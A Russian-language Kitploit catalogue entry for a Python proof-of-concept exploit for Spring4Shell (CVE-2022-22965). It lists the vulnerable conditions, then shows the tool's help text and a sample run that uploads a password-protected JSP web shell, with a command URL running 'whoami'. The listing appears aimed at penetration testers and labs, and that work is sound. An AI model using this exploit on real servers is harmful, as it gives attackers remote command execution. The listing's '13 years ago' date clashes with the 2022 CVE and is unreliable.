Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Spring4Shell-CVE-2022-22965 — Эксплойт на Python для проверки концепции для CVE-2022-22965 (Spring4Shell), нацеленный на RCE в Java Spring Core на Apache Tomcat. Загружает JSP веб-шелл с защитой паролем для удаленного выполнения команд. | Kitploit
Инструменты/GitHubGitHub/sohamsharma966/spring4shell-cve-2022-22965
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubsohamsharma966/spring4shell-cve-2022-22965

Spring4Shell-CVE-2022-22965

Эксплойт на Python для проверки концепции для CVE-2022-22965 (Spring4Shell), нацеленный на RCE в Java Spring Core на Apache Tomcat. Загружает JSP веб-шелл с защитой паролем для удаленного выполнения команд.

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Spring4Shell: CVE-2022-22965 RCE

Уязвимость удаленного выполнения кода в Java Spring framework

Эти уязвимости затрагивают компонент «Spring Core» — сердце фреймворка

Текущие условия для уязвимости:-

  • JDK 9+
  • Уязвимая версия Spring Framework (<5.2 | 5.2.0-19 | 5.3.0-17)
  • Apache Tomcat в качестве сервера для Spring-приложения, упакованного как WAR
  • Зависимость от компонентов spring-webmvc и/или spring-webflux фреймворка Spring

Эксплойт

root@kitploit:~
user@attacker:~$ ./exploit.py --help
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url

Spring4Shell RCE Proof of Concept

positional arguments:
  url                   Target URL

optional arguments:
  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        Name of the file to upload (Default tomcatwar.jsp)
  -p PASSWORD, --password PASSWORD
                        Password to protect the shell with (Default: thm)
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file (Default: ROOT)
root@kitploit:~
user@attacker:~$ ./exploit.py http://MACHINE_IP/
Shell Uploaded Successfully!


# OUTPUT= Your shell can be found at: http://MACHINE_IP/tomcatwar.jsp?pwd=thm&cmd=whoami
Скачать инструмент